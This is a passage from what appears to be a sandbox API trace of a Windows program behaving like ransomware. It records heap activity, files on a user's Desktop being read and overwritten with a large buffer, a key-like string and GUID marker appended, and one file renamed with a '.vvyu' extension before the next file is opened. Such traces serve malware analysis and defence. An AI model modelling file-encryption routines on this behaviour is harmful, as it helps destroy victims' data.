0x0 [0183.115] SetLastError (dwErrCode=0x0) [0183.115] GetLastError () returned 0x0 [0183.115] SetLastError (dwErrCode=0x0) [0183.115] GetLastError () returned 0x0 [0183.115] SetLastError (dwErrCode=0x0) [0183.115] GetLastError () returned 0x0 [0183.115] SetLastError (dwErrCode=0x0) [0183.115] GetLastError () returned 0x0 [0183.115] SetLastError (dwErrCode=0x0) [0183.115] GetLastError () returned 0x0 [0183.116] SetLastError (dwErrCode=0x0) [0183.116] GetLastError () returned 0x0 [0183.116] SetLastError (dwErrCode=0x0) [0183.116] GetLastError () returned 0x0 [0183.116] SetLastError (dwErrCode=0x0) [0183.116] GetLastError () returned 0x0 [0183.116] SetLastError (dwErrCode=0x0) [0183.116] GetLastError () returned 0x0 [0183.116] SetLastError (dwErrCode=0x0) [0183.116] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0183.116] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0183.116] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0183.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4afd0 | out: hHeap=0x6a0000) returned 1 [0183.117] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0183.117] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0183.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.117] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0183.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25810) returned 0x2d43778 [0183.121] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0183.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0183.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2c4afd0 [0183.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d2fc98 [0183.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0183.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d309e8 [0183.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e630 [0183.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d309a0 [0183.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e600 [0183.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e660 [0183.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e678 [0183.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e5d0 [0183.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0183.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x6d5c88 [0183.122] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6d5c88, Size=0x218) returned 0x2d68f90 [0183.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d691b0 [0183.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e660 | out: hHeap=0x6a0000) returned 1 [0183.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e5d0 | out: hHeap=0x6a0000) returned 1 [0183.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e678 | out: hHeap=0x6a0000) returned 1 [0183.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0183.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d691b0 | out: hHeap=0x6a0000) returned 1 [0183.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e678 [0183.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0183.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e5d0 [0183.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0183.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4e660 [0183.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0183.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0183.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0183.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c98 [0183.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0183.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0183.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0183.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0183.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0183.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e5d0 | out: hHeap=0x6a0000) returned 1 [0183.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e660 | out: hHeap=0x6a0000) returned 1 [0183.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0183.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0183.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e678 | out: hHeap=0x6a0000) returned 1 [0183.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.125] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0183.125] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d68f90 | out: hHeap=0x6a0000) returned 1 [0183.125] GetCurrentThreadId () returned 0x264 [0183.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0183.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x6cdde0 [0183.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0183.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0183.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0183.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0183.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0183.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0183.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.126] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.126] GetCurrentThreadId () returned 0x264 [0183.126] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.126] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.126] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0183.126] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.126] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.126] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.127] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0183.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0183.127] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c828a8 [0183.127] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0183.127] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0183.127] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0183.127] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e678 [0183.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.127] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0183.127] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0183.127] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0183.128] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0183.128] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0183.128] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0183.128] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0183.128] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e660 [0183.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0183.128] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0183.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.128] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0183.128] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0183.128] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0183.128] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0183.128] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e5d0 [0183.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0183.128] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0183.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0183.128] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e618 [0183.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0183.128] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e690 [0183.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.128] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0183.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0183.128] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e648 [0183.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.128] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e6f0 [0183.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0183.129] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e6a8 [0183.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6f0 | out: hHeap=0x6a0000) returned 1 [0183.129] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e6f0 [0183.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e648 | out: hHeap=0x6a0000) returned 1 [0183.129] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0183.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0183.129] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0183.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0183.129] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0183.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e660 | out: hHeap=0x6a0000) returned 1 [0183.129] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e660 [0183.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0183.129] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d68f90 [0183.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e678 | out: hHeap=0x6a0000) returned 1 [0183.129] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0183.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6a8 | out: hHeap=0x6a0000) returned 1 [0183.129] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d691a0 [0183.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.129] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0183.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0183.129] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0183.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e660 | out: hHeap=0x6a0000) returned 1 [0183.129] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d693b8 [0183.130] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0183.130] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0183.130] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.130] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0183.131] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.131] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0183.131] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0183.131] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0183.131] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d691a0 | out: hHeap=0x6a0000) returned 1 [0183.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d693b8 | out: hHeap=0x6a0000) returned 1 [0183.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0183.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0183.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6f0 | out: hHeap=0x6a0000) returned 1 [0183.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0183.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e690 | out: hHeap=0x6a0000) returned 1 [0183.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0183.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e5d0 | out: hHeap=0x6a0000) returned 1 [0183.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e618 | out: hHeap=0x6a0000) returned 1 [0183.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0183.133] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0183.133] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0183.133] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e600 | out: hHeap=0x6a0000) returned 1 [0183.133] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d309a0 | out: hHeap=0x6a0000) returned 1 [0183.133] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d68f90 | out: hHeap=0x6a0000) returned 1 [0183.134] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0183.134] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0183.134] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0183.134] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0183.134] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0183.134] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0183.135] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c98 | out: hHeap=0x6a0000) returned 1 [0183.135] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0183.135] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0183.136] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4afd0 | out: hHeap=0x6a0000) returned 1 [0183.136] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x25800, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x25800, lpOverlapped=0x0) returned 1 [0183.138] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0183.138] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xb6800, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.138] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0183.138] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0183.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6ff30 [0183.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d32670 [0183.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d32670, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0183.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d32aa0 [0183.139] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32670 | out: hHeap=0x6a0000) returned 1 [0183.140] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: hHeap=0x6a0000) returned 1 [0183.140] WriteFile (in: hFile=0x584, lpBuffer=0x2d32aa0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d32aa0*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0183.140] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32aa0 | out: hHeap=0x6a0000) returned 1 [0183.140] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0183.140] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0183.140] CloseHandle (hObject=0x584) returned 1 [0183.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0183.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8d0) returned 0x2d32670 [0183.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0183.156] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe.vvyu")) returned 1 [0183.158] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32670 | out: hHeap=0x6a0000) returned 1 [0183.158] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.158] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0183.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b3e8 | out: hHeap=0x6a0000) returned 1 [0183.160] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x519c6e50, ftCreationTime.dwHighDateTime=0x1d89dfe, ftLastAccessTime.dwLowDateTime=0xd3eba8d0, ftLastAccessTime.dwHighDateTime=0x1d8a344, ftLastWriteTime.dwLowDateTime=0xd3eba8d0, ftLastWriteTime.dwHighDateTime=0x1d8a344, nFileSizeHigh=0x0, nFileSizeLow=0xc959, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5fJKex2DUyLjzY0p.bmp", cAlternateFileName="5FJKEX~1.BMP")) returned 1 [0183.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d309a0 [0183.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6ff30 [0183.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d309a0 | out: hHeap=0x6a0000) returned 1 [0183.160] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\5fJKex2DUyLjzY0p.bmp") returned=".bmp" [0183.160] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\5fJKex2DUyLjzY0p.bmp" (normalized: "c:\\users\\keecfmwgj\\desktop\\5fjkex2duyljzy0p.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0183.161] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=51545) returned 1 [0183.161] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0183.163] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xc933, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.163] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0183.166] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.166] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.166] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0183.166] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xc959, lpOverlapped=0x0) returned 1 [0183.167] lstrlenA 